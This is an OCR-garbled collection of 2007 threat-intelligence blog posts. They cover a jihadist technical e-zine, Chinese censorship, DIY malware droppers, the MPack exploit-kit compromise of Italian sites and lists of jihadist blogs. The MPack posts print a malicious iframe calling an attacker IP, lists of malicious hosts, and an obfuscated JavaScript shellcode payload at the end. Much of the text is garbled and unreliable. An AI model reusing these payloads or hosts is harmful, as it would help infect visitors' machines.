
bead CAspiali dS 

(Awe) DE Maids) dy pall Jy b 

Spell PE 
BS SV GS Bp ASI OF ee gd Staple Late pli 2 1b gale death Jia) LF Cita glaald AS sila Oi Le 
EW y LS 800 ow Bype dD 300 yp UKs DL, oie] UKE hae Oy yy al or gw ay ole it 
ge hg Dy a Sl eee ee oe OSs yy St Dye gl J Hel Urge gy OS poe YA palt ola ory tely 
Wand ead gt ASI Diasl J) ees ad ST AS obit) Se Wl et ae ine 


EzStezo, STools, Hide pahi YJB) Se le Sd) Ub eh 0g Stegall yi Peg rte py al apg tt att py 
spots ple eis Of am etal eins bt pty dat et Y ype f Staple it) i Sai iH SI nd Sook 
image quality) 3) pa! Ley Set  ig g 


i? 


ae 
gl! Jol get J Lalinding Sp yee Blew) Las! 


- The second issue of the magazine is diversifying its content to include conventional 
weaponry articles, especially the nasty MANPADS 

- Propaganda is largely increasing, thanks to automated translation software and keywords 
density analysis 

- With articles such as the ABC of running and operating a Jihadist site online, the authors of 
the magazine are aiming to generate even more noise 

- There’s a very experienced team of multimedia/creative designers applying professional 
layouts to the magazine and the articles 


880 


Hex Editor [CeltPhones: pdf] 
Edt View Tools Window Help 


tBHeExiec 


of 
Offsec: OOO72EES of G)072EE7, 99% 


(BOR) ab id 6 od tee gh A Sle 4 pe 


Bhalla be Sy 2) call Jota yet At aa eb al ot of Bed WE Steganography 18) eed! aly alee! te 

Concatenation: Jy¥t Wilt ab 
Nai ah ab elt Caillat gly phe oe hag) S59) Call uly aps at GUY) le UI Ay pall 
VE eT petty 8 eS Sd Slt pe LAS pha teal y Call nd bet 2 17 gee) Ugele al B pell Gy 
Yt i ae ny IS el pay Milas Gg pat IS 9 UI OU pte pa) aS dine 
PDAS go (hase) Atal ple p oe 
Hex Editor - (CellPhones. steg.pdf] yl a 


Help 


ak @ 


06 04 20 04 8M 81 32 BO 36 70 S4 EF 68 68 
FS 2F 70 18 6€ 73 $3 DC 14 2D F4 6B 43 FC DA DO 


| 
Cefset: 00000270 of 00106246, 0% 


01. Article One - An Overview of Steganography and Covert 


Communications 


Article one is continuation from the discussion opened in the first issue on the basics of 
steganography and encryption. Rich on visual material as always, it covers a surprising 
number of steganographic techniques starting from watermarking, and also commenting on 
the process of steganalysis and how degrading the quality of an image let’s say, is a major 
trade-off compared to encryption for instance. The article also includes a comparison of colors 
histogram of an original image and a steganographic one to showcase the trade-off. What 
makes an impression is the evolving editorial and DIY tutorials with definitions of technical 
terms at the end of each article and their Arabic translation.. 


Key terms from article one : 
881 


™ Chi-Square Steganography Test 
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™ Chi Square Steganography Text " 


Steganography (Steganos graphy); Steganalysis; Morse Code; Digital Signal and Image 
Processing; Watermarking; LSB (Least Significant Bit); MSB (Most Significant Bit); Histogram 
(Frequency distribution of RGB); One Way Encryption; Discrete Cosine Transform (Coefficients); 
Enhanced LSB Layers Analysis. 


Moreover, an exampe is given where Islamic military communications in Iraq are hidden 
in a 100x50 pixel picture. Feeling uncomfortable with the idea of jihadists using steganogra- 
phy for communications? So do I, but keeping it realistic instead of denying the reality is even 
worse than actually admitting it. Something else is important to understand as well, and that’s 
to overall lack of situational awareness of the average citizen in any contrying, still living in 
the stereotype of bunch of folks making plans on the sand in a distant cave somewhere in the 
mountains. Your desire to remain what you are is what limits you. 


It also worth discussing why are they including English-to-Arabic translations of techni- 
cal terms, and | think the main goal is to provoke readers to start searching the Arabic web for 
related articles, perhaps a good moment to break the stereotype a mention that online jihadi 
communities is where visitors convert to talkers, and later on doers. 
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02. Article Two - Creating a Jihadist’s Site for Newbies 


In order for jihadists to generate more noise and build a loyal army of believers, the authors 
have taken the time and effort to explain the basics of web design, web hosting, and various 
other issues related to building a jihadists site from scratch. In times of "war on ideologies", 
the bigger the community, the higher chance for possible recruitment. 


03. Article Three - An Overview of Short Range Shoulder-Fired 


Missiles 
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From ITsecurity to conventional weaponry articles, the shift is very interesting one, especially 
the in-depth knowledge on various systems and the countermeasures aircraft have against 
MANPADS. What’s worth mentioning is the PSYOPS motive of jihadist’s sandal on the top of a 
scrap from an obviously taken down helicopter. The articles concludes with detailed technical 
specifications of MANpads and by highlighting the dominance of the Russian [2]IGLA system. 


Key terms from article three : 


Infrared (wavelength greater than 0.7 micron); Ultraviolet (UV: wavelength less than 0.4 
micron); Infrared seeker head; IFF (Identification Friend or Foe) antenna; Digital signal pro- 
cessing (DSP); Counter-Countermeasures(CCM); Directed infrared countermeasures [DIRCM]; 
Sensor- Mercury Cadmium Telluride (HgCdTe) 1- 24mm; Sensor- Indium Antimonide (InSb) 
1-5.5mm 
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04. Article Four - Basics and Importance of Encryption 

Even wondered how Alice and Bob talk exchange keys in Arabic? This article explains in detail 
the basics and importance of encryption, and compared to issue one of the technical mujahid 
which was recommending PGP, the author is now recommending the [3]Mujahideen Secrets 
encryption tool. 


05. Article Five - Basics of Video Recording and Subtitling Clips 
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Wonder how did the whole jihadist multimedia revolution start? As it seems, there’s a 
team of "reporters" attached to militant groups to take recordings of the battles and later one 
include propaganda background music and subtitle them to acheive an even more influential 
effect on their audience. 


Dear wannabe jihadists - if your definition of existence consists in your futile attempt to 
achieve a knowledge-driven jihadist community in the form of generating noise with armies of 
religiously brainwashed soldiers, you face extinction it’s that very simple. 


1. http: //ddanchev. blogspot .com/2006/12/analysis-of-technical-mujahid-issue-one.htm 
2. http://en.wikipedia.org/wiki/9K38_Igla 

3. http: //ddanchev. blogspot .com/2007/04/mujahideen-secrets-encryption-tool .htm 
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3.6.6 Censoring Flickr in China (2007-06-12 12:55) 


Since I’ve been [1]discussing China’s [2]Internet censorship practices, and I’ve been doing it 
pretty much since I’ve started blogging, this is the most recent example of how what’s thought 
to be the most robust and sophisticated censorship system in world is a useless technological 
solution if not implemented "properly". The news of the government censoring a very popular 
site will spread faster, but instead of applying the [3]predefined subversive content detection 
practice and allow anything else, they’re mocking their overhyped censorship system by 
blocking the entire site instead of either removing the content in question or blocking access 
to the specific Flickr set. Futile attempt? For sure, but far more gentle approach of censorship 
compared to the current one. 


Various [4]news sources reported that China’s censoring the entire Flickr. As you can see the 
[5]greatfirewallofchina.org test confirms the block, but it also confirms that [6]Flickr.com itself 
is not censored but any other content within. How come? The idea is that the user user is left 
with the impression that it’s a technical glitch at Flickr.com compared to receiving a censorship 
warning or even a 404 when accessing the main page. Logging in Flickr is possible - verified 
though a Beijing based proxy manually - uploading is also possible, but not content can be seen. 


Flickr = a Yahoo! media company with which the Chinese government has been keep- 
ing close ties in the past so that [7]jailed journalists started filling lawsuits against Yahoo. 
Various bloggers speculated that [8]China banned the entire site due to the leak of protestor’s 
photos on it, and taking into consideration [9]China’s ongoing censorship of mobile com- 
munications such as SMS messages which | covered in a previous post, you may notice 
that the first image of the received sms for the time and place of the protest is censored 
by the photographer herself, especially the time of receivement. [10]The protest is also 
on YouTube, so would YouTube be logically next to get blocked? | doubt so as basically, the 
protest will position itself as an even more high priority issue for the Chinese government. 
The censorship trade-off, should you censor it and add more exclusiveness to it, or ignore and 
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act like it’s nothing serious? [11]Undermine censorship by spreading the censored item further. 


Even more interesting is the fact that couple of months ago, [12]Google’s shareholders 
were about to wage a proxy battle in order for them to convince top management in the 
long-term effects of censorship. [13]Google convinced them that the revenues streaming 
from China with its near the top Internet population are more important and so they agreed. 
Obviously, [14]Yahoo’s shareholders are too, not keen of the fact that their investments are 
driving the oppression of Chinese citizens, and have recently proposed a similar resolution : 


"Amnesty International has today (11 June) expressed its support for two shareholder 
resolutions up for vote at tomorrow’s Yahoo! annual meeting in California, one calling on the 
company to oppose internet repression in countries such as China, and one requesting the 
creation of a corporate Board Committee on Human Rights. " 


New media companies are helpless and obliged under Chinese law to censor if they don’t 
want to lose the option to do business in (Soviet) China, therefore a nation-2-nation actions 
must be taken especially from the world’s major evalgelists of a free society and democracy. 
The rest is [15]a twisted reality - a [16]Tiananmen Square image search outside China, and a 
[17]Tiananmen Square image search in China, everything’s “in order". 


. http: //ddanchev. blogspot .com/2006/02/chinese-internet-censorship-efforts.htm 
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ttp://ddanchev. blogspot .com/2006/07/chinas- interest-of-censoring-mobile.htm 


http://youtube. com/watch?v=xSjNK1Q4iiA 


PR 
rH Oo 


http: //irrepressible.info/ 


HH 
Wn 
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3.6.7 Homosexual Warfare (2007-06-12 13:50) 


Applause for the non-lethal weapons R &D, but [1]a Gay Bomb using aphrodisiacs to provoke 
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sexual behaviour on the field courtesy of the Pentagon, is far more creative than [2]a vomit 
beam for instance : 


"In one sentence of the document it was suggested that a strong 
aphrodisiac 
could be dropped on enemy troops, ideally one which would also cause 


"homosexual behaviour". The aphrodisiac weapon was described as "distasteful but com- 
pletely non-lethal". In its "New Discoveries Needed" section, the document implicitly 
acknowledges that no such chemicals are actually known. " 


Just imagine the situation when a century later, a futuristic History Channel displays 
holograms of such warfare activities. More info on [3]the Gay Bomb, as well as [4]video of 
soldiers on LSD - exceptional warriors win their battles without waging wars. 


1, ftp: //en. wikipedia, ong/wiki/Gay_bont 
2. http: //blog. wired. com/defense/2007/03/navy_researchin. html 
3, http:/ /cbs6. con/topstories/local_ story. 169272641 .ntall 

4, http://video. google .con/*ideoplay ?docid-517198059620627415 


3.6.8 DIY Malware Droppers in the Wild (2007-06-12 20:50) 
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The revenge of the script kiddies, or the master minds releasing DIY tools to let ’em generate 
enough noise as I’ve pointed out in my [1]future trends of malware paper? Further expanding 
the [2]Malicious Wild West series, here are two more recently released DIY malware droppers. 
The detection rate for the generated dropper of the first one is disturbing given it’s not even 
crypted : 


AVG - 06.12.2007 - Downloader.VB.KK 
NOD32v2 - 06.12.2007 - probably unknown NewHeur PE virus 
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Panda - 06.12.2007 - Suspicious file 


No AV detects the packer itself! 


File size : 311296 bytes 


MD5 : 1944378cba81bcd894d43d71dc5fccb5 


SHALL : 920505f2124e8a477ab26a28f81a779d717882be 
EE Downiocad3r 1.0 


URL [http://www host.com/ 
PATH |C\server.ex 


Pack file 
Run downloaded file 


| Create By 


The second one has a much higher detection rate of both the packer and the dropper 


File size : 19001 bytes 


MD5 : abad61857c4b79773326496dec11929b 


SHA1 : 5c74c3572febf7f468b41d9bdc5cbc19eb2348b5 


PandaLabs has recently conducted [3]a study on the increasing use of packers and cryp- 
tors by malware authors worth mentioning : 
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Vim ynaxorm ka Bepcua ynakoei nia 

ASPack Ver 2.120 
Dropper Ver 20 
FSG Ver 2.0 (24.05.2004) 
MEW Ver 11 SEVI2 
a (ex 
a oc 
ORIEN er 212 0 
PESpin Ver 304 
Petite Ver 2.3 (2005) 


" There are many different packers. According to the PandaLabs study, UPX is the most 
common and is used in 15 percent of the malware detected. PECompact and PE, are used 
in 10 percent of cases. However, according to PandaLabs, there are more than 500 types 
of packers that could be used by cyber-crooks. “In essence it is a stealth technique. The 
increasing use of these programs highlights how keen Internet criminals are for their creations 
to go undetected,” explains Luis Corrons, technical director of PandaLabs. " 


You may also be interested in finding out [4]how popular anti virus vendors perform agains 
known, but crypted malware. 


Related posts: 

[5]A Malware Cryptor 
[6]A Malware Cryptor 2 
[7]A Malware Loader 


ttp://www.linuxsecurity.com/docs/malware-trends.pdf 


ttp://ddanchev.blogspot.com/2007/04/shots-from-malicious-wild-west-sample_25.htm 


ttp://www.net-security.org/virus_news.php?id=81 


ttp://ddanchev. blogspot .com/2007/01/testing-anti-virus-software-against .htm 


ttp://ddanchev.blogspot.com/2007/03/shots-from-malicious-wild-west-sample_10.htm 


ttp://ddanchev.blogspot.com/2007/05/yet-another-malware-cryptor-in-wild.html 
ttp://ddanchev. blogspot .com/2007/05/malware-loader-for-sale.htm 
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3.6.9 Israeli Reconnaissance Satellite C&C - Video (2007-06-18 12:29) 
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[1]Catchy demo of a C &C center in Israel, via [2]Cryptome. A violation of OPSEC? Not 
necessarily given that some of the synchonized displays are blurred, but the main purpose 
behind the clip is to communicate that - "yes our IMINT is powerful enough". Some of the most 
recent [3]satellite reconnaissance developments are a great example of the utopian tracking 
of non-existing terrorists’ physical assets, such as boats in this case, even [4]white horses in 
Afghanistan. 


The ocean-surveillance satellites, part of the National Ocean Surveillance System (NOSS), will 
track possible terrorist activities at sea. The two satellites will fly in a regimented formation 
within their elliptical orbits above the Earth so that they will be able to precisely determine the 
positions of ocean-going vessels at different times. This data will be combined with data from 
18 other NRO satellites orbiting the Earth, which are spaced apart at six or seven different 
sections above the Earth’s surface. " 


And while the U.S is investing in a satellite reconnaissance without any "fog of war", an 
effort that’s enviable, but highly innefective when it comes to fighting terrorism, Japan which 
is still heavily [5]relying on U.S sharing of reconnaisance satellites’ data is [6]facing criticism 
for not registering some of its spy satellites, a common practice among many other nations : 


Tokyo has been operating spy satellites for four years that have not been registered with the 
United Nations, despite having signed an international treaty that requires it to report them. 
The Convention on Registration of Objects launched into Outer Space, adopted in 1974 and 
proclaimed in 1976, required signatories to identify the artificial satellites and other objects 
they put in space. Japan signed that treaty in 1983. Treaty violations are not subject to 
punishment. " 


precisely the type of possible pre-launch information leakage | pointed out in [7]a previ- 
ous post on stealth satellites : 


"You can’t [8]hijack, intercept or hide from what you don’t see or don’t know it’s there, 
and stealthy satellites are going to get even more attention in the ongoing [9]weaponization 
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of space and the emerging [10]space warfare arms race . Here’s a [11]huge compilation of 


articles and news items related to the development of stealthy satellites . 


A pre-launch leak in today’s OSINT world is the worst enemy of the concept of stealth 
satellites. Here’s an in-depth [12]assessment of China’s anti-satellite programs worth going 
through as well. 


Related posts: 


[13] Satellite Imagery of Secret or Sensitive Locations 


[14] U.K’s Latest Military Satellite System 


[15]The History and Future of U.S. Military Satellite Communication Systems 
[16]China Targeting U.S Satellite - Laser Ranging or Demonstration of Power? 


[17]Open Source North Korean IMINT Reloaded 
[18]lran Bans Purchase of Foreign Satellite Data 
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ttp://www.4law.co.il/ofek7/player.htm 
ttp://cryptome.org/ 
ttp://www.itwire.com.au/content/view/12917/1066/ 


ttp://ddanchev. blogspot .com/2006/11/satellite-imagery-trade-offs.htm 
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ttp://ddanchev.blogspot.com/2006/07/japans-reliance-on-us-spy-satellites.htm 


ttp://ddanchev. blogspot .com/2006/10/history-and-future-of-us-military.htm 


ttp://ddanchev. blogspot .com/2007/01/iran-bans-purchase-of-foreign-satellite.htm 
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3.6.10 Massive Embedded Web Attack in Italy (2007-06-20 13:27) 


MPack v0.86 stat 


IE XP ALL 39062 - 35472 


onerer _| _ataain 


Total traff: 53858 - 47831 
Exploited: 11981 - 10222 
[toads coun | ss10 5155 


Loader's 46.06% - 
cere 50.43% 


User | User blocking: 


The Web is [1]abuzz with [2]news stories [3]regarding the [4]MPACK web exploitation kit 
installed on [5]over 10,000 mostly Italian based sites, and in the spirit of previous [6Janalyses 
of malicious URLs here’s an overview of the strategy of the attack, the outcome, and IPs in 
quesiton, thus the ones that should get blacklisted or [7]CYBERINT applied for further juicy 
details on the severity of the attack. 


The strategy of the attack 

Picture yourself in the position of a malicious attacker wanting to infect the highest number of 
PCs possible in the shortest timeframe. How would you go for infecting the highest possible 
proportion of internet surfers using outdated software, ones still living in the "don’t open 
.exe attachments" self-vigilance world? You'll either figure out a way to exploit vulnerabilities 
within a huge number of web sites and automatically embed the malicious payload, or breach 
a shared hosting provider and infect all of its customer, thus potentially infecting all of their 
future visitors. Which is exactly what happened in the most recent case of what’s turning into 
a massive epidemic of MPACK embedded sites. 


The outcome of the attack 

- Over 10,000 sites affected according to WebSense 

- hundreds of thousands PCs currently infected according to obtained MPACK statistics 

- [8]the majority of infected PCs are located in Italy given the breach of the [9]shared hosting 
provider Aruba 
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Dissecting the attack 
It all started when popular Italian sites had the following IFRAME embedded within their front 
pages: 


name=’StatPage’ src=’hllp://58.65.239.180/’ width=5 height=5 
The entire attack is currently orbiting around the following IPs : 


58.65.239.180 
64.38.33.13 
194.146.207.129 
194.146.207.18 
194.146.207.23 
81.177.8.30 
203.121.71.183 
81.95.148.42 
81.95.149.114 


Input URL: 58.65.239.180 

Effective URL: hllp://truman.dnspathing.com/suspended.page/ 
Responding IP: 64.38.33.10 

HTTP/1.1 302 Moved TemporarilyServer: nginx/0.5.17 

Date: Tue, 19 Jun 2007 22:56:01 GMT 

Content-Type: text/html 

Content-Length: 161 

Connection: keep-alive 

Location: hllp://64.38.33.13/ ftpcom/ 


More coverage : 
[10]ISC, [11]Symantec, [12]WebSense, [13]TrendMicro, [14]Finjan - great to see [15]they 
came across my analysis [16]of ms-counter.com as well - [17]PandaLabs. 


UPDATE: 


[18]MPACK’s Builder Screenshot courtesy of Symantec. Meanwhile, here are the exploits 
available in the latest 0.90 release of the web exploitation kit : 


- modified MSO06-014 

- MS06-006 Firefox 1.5.x Opera 7.x 
- Oday Win2000 (ms06-044) 

- XML overflow under XP2k3 

- WebViewFolderlicon overflow 

- WinZip ActiveX overflow 

- QuickTime overflow 

- ANI overflow 


The majority of news articles | came across to are emphasizing that the kit is available 
for sale at $1000. True, but only if you’re purchasing it from the original source, namely, the 
kit has been a commodity for quite a while, with different propositions modifying the source 
code and selling it for much less, even bargaining with it in case someone’s interested in the 
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associated in the [19]related underground services offered. 


Even more ironic in the case of this particular attack is that while performing the cyber 
forensics part, | came across another malicious site farm hosting dialers courtesy of CAR- 
PEDIEM. And while the IFRAME part of the massive embedded Italy based attack was gone 
in the time of checking the dialers, even previous instances of CoolWebSearch were still 
in place. The second malicious campaign is run via sv2.biz, campaign id = 15682, all the 
pOrn sites at 193.110.146.69 which is hosting all the dialers-embedded sites in question. 
From another perspective the benefits of infecting a web sites farm run on a single IP with 
probably hundreds of thousands of visitors in the shortest timeframe possible, has a major 
flaw, blocking 192.110.146.69 aka CARPEDIEM, which is a matter of fact listed by Google as a 
harmful site will temporarily mitigate the threat. 


Initiating traceback of a [20]site that’s participating in two malicious campaigns : 


1 -> hilp://www.dojinshi.biz/dojin/ 
Responding IP: 62.149.130.37 


2 -> Sites spreading the dialers within : 


hilp://www.analream.com/index.html?id=15682 
Responding IP: 193.110.146.69 


Dynamics of infection : 
basically, the host name is identical with the distributed .exe’s 


My Paraml[’rf’] = "AnalReamV2KTU"; 

My Param[’id _produit’] = 550; 

My Paraml[’id _site’] = 995; 

My Paraml[’synergie’] = ’h’; 

My Paraml[’color’] = ‘fire’; 

My Param[’name_kit’] = "AnalReam.exe" 


Here’s the entire campaign list : 


asian-booty.com/?id=15682 
bukkakenation.com/us/index.html?id=15682 
devilteen.com/?id=15682 
fetishcell.com/?id=15682 
flowerbabes.com/index.html?id=15682 
mrstrollop.co.uk/index.html?id=15682 
sexyharem.com/?id=15682 
sorority-house.com/index.html?id=15682 
sublimanal.com/us/index.html?id=15682 
tottyunited.co.uk/index.html?id=15682 
trashedtramps.com/?id=15682 
gangbangdemolition.com/us/?id=15682 
gothnymphs.com/?id=15682 
kinkythighs.com/?id=15682 
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porndivinity.com/?id=15682 
newhentai.com/us/index.html? &id=15682 
kumtomi.com/index.html? &id=15682 


Situational awareness at its best is what truly matter at the bottom line. 
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ttp://it.slashdot.org/it/07/06/19/0215244. shtm 


ttp://www.scmagazine.com/uk/news/article/665192/italian- job-trojan-infecting-thousands-servers/ 


ttp://webnews .html.it/news/leggi/6229/server-aruba-sotto-attacco-allarme-in-italia/ 


ttp://alexsandra. wordpress .com/2007/06/17/possibile-intrusione-nei-sistemi-aruba/ 


. http://isc.sans.org/diary.html?storyid=2991 


. http://www.symantec.com/enterprise/security_response/weblog/2007/05/mpack_packed_full_of_badness.htm 


. http://www.websense.com/securitylabs/alerts/alert.php?AlertID=782 


ttp://blog.trendmicro.com/another-malware-pulls-an-italian-job/ 


| cep: //wwe finan, con/MORGbLog. aspx 7EntxyTa=1556 

| hvtp://ues#injan.con/MRGbLog. aspx 7Entryl4°1688 

ttp://ddanchev. blogspot .com/2007/03/shots-from-malicious-wild-west-sample.htm 
_hvtp://ologspandasof tare con/blogs/panda abs /archive/2001/06/19/More-about-Hpack agp 
Rico oescyemtac, coal encecpetoa/accnz ty, cuupaste/cettog/apiout/2001/0o/neak- arog Tl 
_hvtp://adanchev. blogspot. con/2001/05/nderground-econonys~supply-of-goods. hl 
_nvtp://wwsvebsense con/securitylabs/alerts alert. php?AlertID~T83 
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3.6.11 MANPADS and Terrorism (2007-06-21 00:56) 
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Can terrorist entities easily obtain shoulder-launched surface-to-air missiles and how are 
they achieving it? How is [1]sensitive military technology leaking into the hands of those 
supposedly not in a position to take down modern aircraft? Did the overall shift of discussion 
aiming to shred more light into the guerilla type of asymmetric dominance terrorists have, 
excluded the real discussion of how MANPADS and [2]night vision equipped fighters take lifes 
on a daily basis in the very sense of conventional warfare? 


FAS analyst Matt Schroeder tries to answer these questions in a recently released publication 
entitled "[3]Global efforts to control MANPADS" : 


"Preventing the acquisition and use of man-portable air defence systems (MANPADS) by terror- 
ists and 
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rebel groups has been a matter of concern since the early 1970s. However, despite the per- 
sistence of the threat MANPADS pose to aviation, it was the 2002 al-Qaeda attack on an Israeli 
civilian aircraft flying out of Mombassa, Kenya, that focused world attention on the issue. This 
introductory section continues by providing some basic information on the development and 
main types of MANPADS and their capabilities. Section II of this appendix gives an overview of 
the main threats posed by the weapon. Section III reviews efforts to control the weapon prior to 
the Mombassa attack, and section IV examines contemporary counter-MANPADS efforts. Sec- 
tion V presents some concluding observations and recommendations for further action." 


Export controls, stockpile destruction, physical security and stockpile management practices, 
buy-back programmes, and active defence measures: airports and airliners are among the key 
topics discussed. Here’s a related post on the topic "[4]Video Shows Somali Insurgent with 
Sophisticated SA-18 Missile" as well. 


Images courtesy of a MANPADS related article in [5]the second issue of the Technical Mujahid 
E-zine. 


1. http://ddanchev. blogspot .com/2007/01/transferring-sensitive-military.htm 


2. http://www.sfgate.com/cgi-bin/article.cgi?file=/c/a/2006/08/20/MNGK9KLVH41 . DT 


3. http://www.fas.org/asmp/library/reports/2007SIPRIYearbookappen14A. pdf 


4. http://www.fas.org/blog/ssp/2007/06/video_shows_somali_insurgent_w.php 
5. http://ddanchev.blogspot.com/2007/06/analysis-of-technical-mujahid-issue-two.htm 
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3.6.12 A List of Terrorists’ Blogs (2007-06-21 15:20) 
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Following previous posts "[1]Full List of Hezbollah’s Internet Sites", and "[2]Hezbollah’s DNS 
Service Providers from 1998 to 2006", here’s a list of terrorist/jinadists related blogs hosted at 
Wordpress.com, spreading propaganda, violent videos, and yes, glorifying terrorism. The raw 
content is fascinating, and the main idea behind this multilingual propaganda translations are 
to wage a "battle of ideas". 


The list and associated analyses : 


01. [3]The Global Islamic Media Front 
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Ln - + 2 aa 
forces had has hav: ne AC islam sl amic 
jihad know land like lord make many may more most muhammad mujahideen muslim muslims must 


= 


OUP out over palestine peace people power prophet 


LL Ss 
religion say shall SO soldiers some state than TN! =|} | 


Keywords density : 
you 531 


allah 493 
their 381 
they 312 
them 306 
which 278 
we 269 
his 266 
not 253 
have 251 


aber abu aischa ai @llah allahs ate als anderen auch AU! 


laec ar ada tac 
class CEN) denn ces 


fr frau frauen gesandten gesicht haben hadith hat IBN ich itm 


buch dann C las 


werden wie wir wird wurde ZU zum 


02. [4]The Global Islamic Media Front - in German 


Keywords density : 
die 389 
der 374 
von 215 
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ist 187 
sie 175 
den 163 
zu 161 
das 143 
dass 136 
es 129 


03. [5]Abusayfullah 


2007news abusayfullaah ahmad al alaykum all allah APP around assalaamu balad been 


being bomb born brothers car central city closed comment COmments courts day everything fighting 


* 


is 


them they those tigree told town UNCP us used very wa want we were which would 
you 2 2007 


Keywords density: 


he 33 
his 25 
we 25 
they 23 
allah 23 


news 23 


shaykh 17 


people 16 


wa 16 


fighting 14 
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abu after ahmad al all allaah Al al 1 allh also among any back D@CAUSE become been believe 
book brothers et can deen did UO does emg enemy even first go had have he 
AIM himself i itn AF into islam islamic its Jihad kafr killed Kur tie like lord make man 
may middot most mujahid mujahideen muslim musims night MO nor not « one 
operations other Our out people ide religion rescue rulers Said ;3, SO some such take 
than th eir then there th 1ey h 


ch while you 2007 


04. [6]Caravan of Martyrs 
Keywords density: 

he 186 

his 147 

not 124 

allah 122 

him 106 

they 104 

them 82 

one 73 


HOSE time until upon us war way we were 


you 69 
their 66 


The following are no longer updated : 


[7 ]Inshallahshaheed 
[8]Alkarnee 
[9]}Truthline 
[10]Moderatesrefuted 
[11]Naseeha 


Here are some more worth going through or crawling : 


[12]Jinad Fields are Calling! 
[13]Crusader Watcher 
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As always these are just the tip of the iceberg, but yet another clear indication of [14]the 
digitalization of jihad. 


ttp://ddanchev. blogspot .com/2006/12/full-list-of-hezbollahs-internet-sites.htm 


. http: //ddanchev. blogspot .com/2006/09/hezbollahs-dns-service-providers-from.htm 


ttp://gimf1.wordpress.com/ 


. http: //abusayfullaah. wordpress.com 
. http: //caravanofmartyrs.wordpress.com 
. http: //inshallahshaheed.wordpress.com/ 


. http://truthline.wordpress.com, 
10. http: //moderatesrefuted.wordpress.com 


11. http://naseeha. wordpress.com 
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. http: //mujahidfisabeelillah. wordpress. com/ 
13. 
14. 


ttp://www.crusaderwatcher .blogspot.com/ 


pestini ~ ' 


With China no longer feeling pround of its position in the top 3 main sources of spam on a 
worldwide basis, the coutry is going a step beyond the [1]bureaucratic measure to fight soam 
by licensing email servers undertaken back in April, 2006, and has recently launched [2]a 
blacklist of Chinese spammers : 


"The comprehensive anti-spam processing platform ([3]http://www.iscbl.anti-spam.cn/) will 
post a regularly updated blacklist of soam servers, allowing telecom operators and mail 
service providers to access the information. Over 100,000 IP addresses have been black- 
listed thanks to public reports, said Zhao Zhiguo, vice-director of the telecommunications 
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department of the [4]Ministry of Information Industry. A "white list" of mail service providers 
will also be posted on the website, boosting the development of lawful mail service providers, 
such as the country’s big players Sina, 163 and Sohu. ISC Secretary-General Huang Chengging 
said the website will gradually open to the public and businesses to accelerate anti-spam 
efforts domestically and internationally." 


And [5]despite that major [6]blacklist providers [7]have been providing [8]such lists for years, 
[9]China’s inside-towards-outside approach is a great example on the most effective, yet not 
so popular approach of dedicating more efforts into filtering outgoing spam, compared to the 
current approach of filtering incoming one. Only if responsibility is forwarded to [10]the ISPs 
doing nothing to filter outgoing spam - who will later on offer you a free spam protection to 
differentiate their USP - we can start seeing results. 7h3 r3 $t i $ a cat and mouse game, and 
overall decline in the confidence and reliability of email communications. 


World spamming map courtesy of Postini. 


ttp://ddanchev. blogspot .com/2006/04/fighting-internets-email- junk-through. html 


1. 

2 

3. 

4 
5. 

6. : F ; 

7. 3 ; 

8. : : .china. 
9. : - 
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3.6.14 The MPack Kit Attack on Video (2007-06-22 15:19) 


Video demonstration of [1]MPack courtesy of Symantec, goes through various infected sites 
and showcases the consequences of visiting them : "This video demonstrates how a system 
is compromised by a malicious IFRAME and how the MPack gang has accomplished this on 
literally thousands of websites (mostly Italian) through usage of an IFRAME manager tool." 


[EMBED] 


Meanwhile, dekalab.info is yet another malicious URL exploiting MDAC ActiveX code exe- 
cution (CVE-2006-0003) for you to analyze, among the many already patched vulnerabilities 
used in [2]the latest version of Mpack. The question remains - how many zero days are 
currently exploited in the wild through the MPack kit? The "best" is yet to come, paying 
attention to the periodical new supply of loaders - 58.65.239.180 got last updated Date: Thu, 
21 Jun 2007 22:02:08 GMT - indicates commitment. 
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<script 

language=javascript>docunent .write(unescape("%20%00%0a%acht mIZ3E%Chead&aERacscript%2olang 
622 JavaScript%22%3E% 60% GA% BDZ GAVar%2 BmmZ2 64322 Gnews2 BArr ay%28%29%3B% OD% GAVar%2 Omem_Flag%2 
0%3B%00% 0AZ OD BAF UNCtiONS2 OhZ28%29%2 O47 BmnZ3D mnZ3BF2 Oset Timeout%28%22n%28%29%22%20%2 02 H00% 
D%6D%6A% OD% GAFUNCtions2 ge tbhZ28b%20%2 ObSize%29%OD%GA%7 Bwhile%2 6%28b . Length*2%3CbSize%29%7B 
D%2 6b%3B%7D% OD% GAL%2 6%3D%2 Ob -substring%28 6¢2CbSize/2%29%3Breturn%2 6b%3B%7D% 6D% GA% OD% GAFunc 
CF%28%29% BD%GN%7 Buar%2 620%2 843D%2 BOx Bc Gc Bc OC%3B% OD% GAVar%2 Ga%2 O43D%2 Gunescape%28%22%25uh34 
43%25u fF eb%25u335b%25u66c9%25u8 Ob9S25u8 001425 uel 33%22%2 B+ OZ GAL22%25ue243%25uebFaz25uesos 
cS25uF FF FZ25u8b7 FZ25udF4e%Z25uefeFZ25u64eFSZ25uesafS25u9 FO4s25u42F3zZ25u9 fF 64Z25usee7Z25ueF 43% 
%22%2 O+% OD%GAY22%25 u64e FS25ub9 O3%25u61874%25ue 1a1%25u 87 O38%25ue fF 11%25ue fe rSZ25uaas6%25ub9eb%2 
25u6511%25u87e1%2S5uef1F%25uefefS25uaab6S%25ub9e7%22%2 B+% ODS GA%22%25uca87425u1 OS F%25uB72d%25 
Suefef%25uaa66%25ub9e3%25u 8887%25u BF 21%25u 878 F225ueF SbZ25uefefZ25uaass6Z25ub9FFSZ25u2e87%25u 
%20+% 00% 0A%22%25u 0757Z25uef29%25uefefe25uaab6Z25uat fbZ25ud76F%25u9a2c%25ub6615425uF7aas25ue 
efee%Z25ub1eFS25u9 a66%25u64cb%25uebaay25uee85%22%2 B+ % OD GAS22%2 5 u64bo%Z25uf 7bas25uH7b9Z25ueF 
Fef%25u87bFSZ25uFS5d9S25u9 Fc O425u78 O7%25ueFeFSZ25u66eFS25 uf 3aag25u2abus25u2Fécs25u66bFe25ucfa 
+%OD%GN%22%25u1 O87%25uefefZ25ubFefS25uaabu%25u85 Fb%25 ub6eds25ubabusZ25u 87 F7Z25uefBex25uefeFr 
c%25u28c FZ2Sub3seF%25uc191%25u288as25uebafZ22%2 0+% OD%GAZ22425u8a97 Z25uefers25uI9al OZ25uG4cFkS 
e25uee85%25ub64b6%25uf 7ba%25uat O7%25ueferZ25usB5eFfSZ25ub7e8S25uaaecs25udccbdS25ubc34%25ul Obc%Z2 
